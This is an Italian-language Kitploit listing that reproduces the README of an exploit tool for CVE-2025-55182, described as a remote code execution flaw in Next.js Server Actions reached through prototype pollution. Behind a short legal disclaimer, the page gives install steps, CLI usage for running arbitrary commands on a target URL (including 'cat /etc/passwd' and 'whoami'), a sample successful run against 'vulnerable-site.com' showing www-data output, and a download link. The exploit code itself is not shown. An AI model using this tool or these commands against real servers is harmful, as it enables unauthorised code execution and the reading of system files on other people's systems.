Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
cve-2025-55182-node — CVE-2025-55182 Strumento di exploit RCE per Next.js | Kitploit
Strumenti/GitHubGitHub/racall/cve-2025-55182-node
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHubracall/cve-2025-55182-node

cve-2025-55182-node

CVE-2025-55182 Strumento di exploit RCE per Next.js

Vedi Repository
18 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-55182 Strumento di exploit RCE per Next.js

Documentazione in cinese | Analisi della vulnerabilità


[!CAUTION]

⚠️ AVVERTENZA - LEGGERE PRIMA DELL'USO

Questo strumento è destinato SOLO a:

  • Ricercatori di sicurezza che conducono la verifica di vulnerabilità
  • Test di penetrazione autorizzati con permesso esplicito
  • Scopi educativi e di apprendimento

L'accesso non autorizzato a sistemi informatici è ILLEGALE.

Utilizzando questo strumento, accetti che:

  1. Hai ottenuto la dovuta autorizzazione prima di testare qualsiasi sistema
  2. Non userai questo strumento per scopi dannosi
  3. Sei l'unico responsabile delle tue azioni e di qualsiasi conseguenza

L'autore non si assume ALCUNA responsabilità per un uso improprio di questo strumento.


Uno strumento di exploit per l'esecuzione remota di codice (RCE) per la vulnerabilità di prototype pollution lato server di Next.js.

Panoramica della vulnerabilità

CVE-2025-55182 è una vulnerabilità di sicurezza critica che colpisce Next.js e consente agli attaccanti di ottenere l'esecuzione remota di codice tramite richieste appositamente formulate che sfruttano la prototype pollution.

📖 Per un'analisi tecnica dettagliata, consulta EXPLOIT.md

Versioni interessate

  • Versioni specifiche di Next.js (fare riferimento all'avviso di sicurezza ufficiale)

Come funziona

Questa vulnerabilità sfrutta il meccanismo di gestione delle richieste Server Actions di Next.js, ottenendo l'esecuzione arbitraria di codice tramite la contaminazione della catena del prototipo __proto__ combinata con il costruttore Function.

Installazione

root@kitploit:~
# Using yarn
yarn install

# Using npm
npm install

Utilizzo

Esecuzione diretta

root@kitploit:~
# Basic usage
node index.js <target_url> [command]

# Examples
node index.js http://localhost:3000
node index.js http://localhost:3000 "ls -la"
node index.js http://localhost:3000 "cat /etc/passwd"

Utilizzo degli script yarn

root@kitploit:~
# Run the tool
yarn start http://localhost:3000 "whoami"

# Or use alias
yarn exploit http://localhost:3000 "ls -la"

# Show help
yarn help

Installazione globale da CLI

root@kitploit:~
# Link globally
yarn link
# or
npm link

# Then use the command directly
cve-2025-55182 http://localhost:3000
cve-2025-55182 http://localhost:3000 "whoami"

# Unlink
yarn unlink

Opzioni CLI

root@kitploit:~
Usage:
  cve-2025-55182 <url> [command]

Arguments:
  url       Target URL (required)
  command   Command to execute (default: whoami)

Options:
  -h, --help     Show help message
  -v, --version  Show version number

Formato di output

Lo strumento restituisce i risultati in formato JSON:

Esecuzione riuscita

root@kitploit:~
{
  "success": true,
  "message": "",
  "data": "command execution result"
}

Esecuzione fallita

root@kitploit:~
{
  "success": false,
  "message": "error message",
  "data": null
}

Esempio

root@kitploit:~
$ cve-2025-55182 http://vulnerable-site.com "id"
{
  "success": true,
  "message": "",
  "data": "uid=1000(www-data) gid=1000(www-data) groups=1000(www-data)"
}

Dipendenze

  • axios - Client HTTP
  • form-data - Builder di FormData

Riferimenti

  • Fai riferimento agli script Python
Scarica lo strumento